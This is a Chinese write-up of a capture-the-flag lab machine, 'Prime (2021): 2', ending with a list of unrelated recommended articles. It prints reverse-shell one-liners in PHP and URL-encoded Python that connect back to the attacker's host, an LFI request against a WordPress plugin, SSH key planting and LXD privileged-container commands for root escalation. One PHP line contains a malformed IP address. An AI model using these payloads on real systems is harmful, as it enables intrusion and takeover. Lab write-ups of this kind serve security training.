Prime (2021): 2

前言

这个靶机有亿点难,收获很多。打靶的时候,前面很顺,到创建ssh公钥之后就一点不会了。

1

01

arp扫描,发现有一个130,再查看端口

有22,80,129,445,10123

dirb扫描目录


这里的something里面有一个jarves,应该是用户名称

继续找,发现upload里有cmd,应该是利用这里上传shell

02

/wp有一个wordpress,去搜索知道是一个平台,我们可以用wpscan去扫描wordpress,翻LFI是一个本地文件包含漏洞,不知道怎么利用,看wp要利用这里的https://www.exploit-db.com/exploits/46537/

打开后,找到这一行

发现用户jarves

/server里有一个zip,去搜索了知道,这是gila cms,没什么用处

初步信息收集完成

2

再进行上传shell操作,因为,上文提到的php文件,我这里用php提权

php -r '$sock=fsockopen("47.192.168.157.128",2333);exec("/bin/sh -i <&3 >&3 2>&3");'

我这里失败了,换python试试

192.168.157.130/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=.../.../.../.../.../.../.../.../.../.../home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.157.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%22/bin/sh%22,%22-i%22);%27

再升级shell

去home目录查看信息,有jarves

tmp里没有东西可以利用

查看/var,var目录的详细信息

查看/var/www

找到root的密码:root

我这里想去ssh连接,发现密码不对

3

剩下的步骤基本是看wp

要先用两个工具smbclientenum4linux

再创建ssh公钥

将id_rsa.pub复制到tmp目录下命名位authorized_keys

将authorized_keys上传到目标主机的.ssh目录下

然后使用ssh登录到目标主机

4

发现jarves还属于lxd组

从github下载构建好的Alpine,然后进行执行

接着我们将生成的文件上传至目标机器

wget http://192.168.157.130:7777/lxd-alpine-builder/alpine-v3.14-x86_64-20240410_1650.tar.gz

接着我们使用lxd进行初始化

​lxd init

导入镜像

lxc image import ./alpine-v3.14-x86_64-20240410_1650.tar.gz --alias myimage

进入到容器的命令行

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

替换mnt/root目录下的authorized_keys文件

最后使用ssh连接拿到root权限

相关推荐
ClouGence29 分钟前
跨云、跨地域数据同步,这样更省心
数据库·sql·saas
梦想的旅途243 分钟前
利用 API 实现企业微信消息自动化推送
运维·自动化·企业微信
Acrellea1 小时前
固态变压器(SST)热管理破局:安科瑞交直流专属测温方案护航无人值守运维
运维·网络
TDengine (老段)1 小时前
TDengine 函数完整参考 — 聚合、时序、字符串、时间、数学
大数据·数据库·物联网·时序数据库·iot·tdengine·涛思数据
寒冰碧海1 小时前
大模型部署从0到1(一):通用环境全流程准备|NVIDIA驱动+Docker+NVIDIA Container Toolkit
运维·docker·容器
风曦Kisaki1 小时前
# Linux 系统资源查看命令总结(附命令快查表)
linux·运维·服务器
TDengine (老段)2 小时前
昆仑数智选择 TDengine TSDB,提升页岩气生产运行可视化与精细化管理能力
大数据·数据库·物联网·时序数据库·tdengine·涛思数据
陆水A2 小时前
【问数系统】SQL跑对了图表却空了?打通问数系统最后1公里的3个API坑
大数据·数据库·自然语言处理·big data·etl工程师
蝶恋舞者2 小时前
DNS 服务器(后续持续更新)
运维·服务器
海外数字观察家2 小时前
品未云:泰国华商批发零售一体化 ERP,破解本土软件适配难题|CSDN 技术分享
网络·数据库·人工智能